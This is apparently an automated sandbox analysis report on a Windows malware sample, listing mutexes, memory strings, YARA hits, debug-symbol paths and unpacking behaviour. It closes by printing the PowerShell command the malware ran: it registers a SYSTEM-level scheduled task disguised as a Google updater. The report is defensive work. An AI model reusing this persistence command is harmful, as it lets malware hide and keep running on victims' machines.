Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4032:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5336:120:WilError_03

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: K"M`	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: E!{	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: S"Z	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: rNr<	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: OFBp	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: sB1s	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: T`"+	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: 7(C	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: u+[	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: )\2	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: +.h	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: =)W{	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: 35e	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: $iEz	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: X!pq	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: gew	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: ogr(	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: o%HQ	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: \Sj=	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: WTE	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: [l1h	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: fPT	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: \|59M	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: O2l[	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: k'Z#	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: hRjT	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: msX?	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: c<z	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: `*T	3_2_0042A660
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Command line argument: Yx@t	3_2_0042A660

Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
Source: e0cbefcb1af40c7d4aff4aca26621a98.exe	String found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind

Source: Yara match	File source: 4.0.Broom.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.2106864524.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Broom.exe, type: DROPPED

Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\explorer.exe

Source: C:\Users\user\AppData\Local\Temp\latestX.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Users\user\AppData\Local\Temp\Broom.exe

Window found: window name: TButton

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Program Files\Google\Chrome\updater.exe

Directory created: C:\Program Files\Google\Libs

Source: file.exe

Static file information: File size 13188608 > 1048576

Source: file.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0xc93400

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Loader.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: e0cbefcb1af40c7d4aff4aca26621a98.exe
Source:	Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Age does not matchThe module age and .pdb age do not match. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe
Source:	Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Downloading symbols for [%s] %ssrvsymsrvhttp://https://_bad_pdb_file.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Drive not readyThis error indicates a .pdb file related failure. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Unable to locate the .pdb file in this location source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: The module signature does not match with .pdb signature. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: .pdb.dbg source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: '(EfiGuardDxe.pdbx source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdbGCTL source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.00000000040D8000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000C7A000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000037E9000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: or you do not have access permission to the .pdb location. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: EfiGuardDxe.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Signature does not matchThe module signature does not match with .pdb signature source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdbGCTL source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Unpacked PE file: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Unpacked PE file: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Unpacked PE file: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Unpacked PE file: 9.2.toolspub2.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Unpacked PE file: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\AppData\Roaming\cdttvvc	Unpacked PE file: 59.2.cdttvvc.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;

Suspicious powershell command line found

Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
